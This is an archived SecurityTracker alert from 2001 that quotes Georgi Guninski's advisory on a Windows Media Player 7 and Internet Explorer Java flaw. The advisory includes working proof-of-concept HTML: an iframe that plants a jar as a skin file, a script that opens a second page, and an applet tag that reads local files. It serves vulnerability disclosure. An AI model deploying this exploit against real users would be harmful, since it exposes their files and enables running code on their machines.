SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Windows Media Player Vendors:   Microsoft
Windows Media Player 7 Allows IE/Java to Execute Arbitrary Code on the Media Player's Host
SecurityTracker Alert ID:  1000582
SecurityTracker URL:  http://securitytracker.com/id/1000582
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 15 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): Windows Media Player 7
Description:   A vulnerability has been reported in Windows Media Player 7 that is exploitable thru IE and java which allows the reading of local files and browsing of directories which, in turn, may allow the execution of arbitratrary programs on the client's host.

The problem involves Windows Media Player skins, which are installed in a known directory and with a known name: "C:/Program files/Windows Media Player/Skins/SKIN.WMZ"

The code <IFRAME SRC="wmp2.wmz"></IFRAME> will download wmp2.wmz and place it in "C:/Program files/Windows Media Player/Skins/wmp2.wmz". The file wmp2.wmz may be a malicious java jar archive. Then, a malicious applet tag can be executed with codebase="file://c:/" and the applet will have read only access to C:\.

The vendor was reportedly contacted on 11 January 2001.

More information is available in Georgi Guninski security advisory #35, 2001.

Impact:   An attacker could read directory listings and files and could execute arbitrary programs on the target host.
Solution:   No solution was available at the time of this entry. However, Java can be disabled on IE to prevent exploitation via this vulnerability.
Vendor URL:  www.microsoft.com/technet/security/current.asp (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Windows Media Player 7 and IE java vulnerability - executing


Georgi Guninski security advisory #35, 2001

Windows Media Player 7 and IE java vulnerability - executing arbitrary programs

Systems affected:
Windows Media Player 7 and IE

Risk: High
Date: 15 January 2001

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

There is a security vulnerability in Windows Media Player 7 exploitable thru IE and java
which allows reading local files and browsing directories which in turn allows executing
arbitratrary programs. This may lead to taking full control over user's computer.

Details:
The problem is WMP skins are installed in a known directory and with a known name:
"C:/Program files/Windows Media Player/Skins/SKIN.WMZ" : <IFRAME SRC="wmp2.wmz"></IFRAME>
will download wmp2.wmz and place it in "C:/Program files/Windows Media Player/Skins/wmp2.wmz".
wmp2.wmz may be a java jar archive. The following applet tag:
--------------
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
---------------
will be executed with codebase="file://c:/" and the applet will have read only access to C:\.


The code is:
--------wmp7-3.html--------------------------------------------------
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f()
{
window.open("wmp7-3a.html");
}
setTimeout("f()",4000);
</SCRIPT>
---------------------------------------------------------------------

------wmp7-3a.html---------------------------------------------------
<APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
---------------------------------------------------------------------

Workaround:
Disable Java.

Demonstration is available at:
http://www.guninski.com/wmp7-3.html

Vendor status:
Microsoft was contacted on 11 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC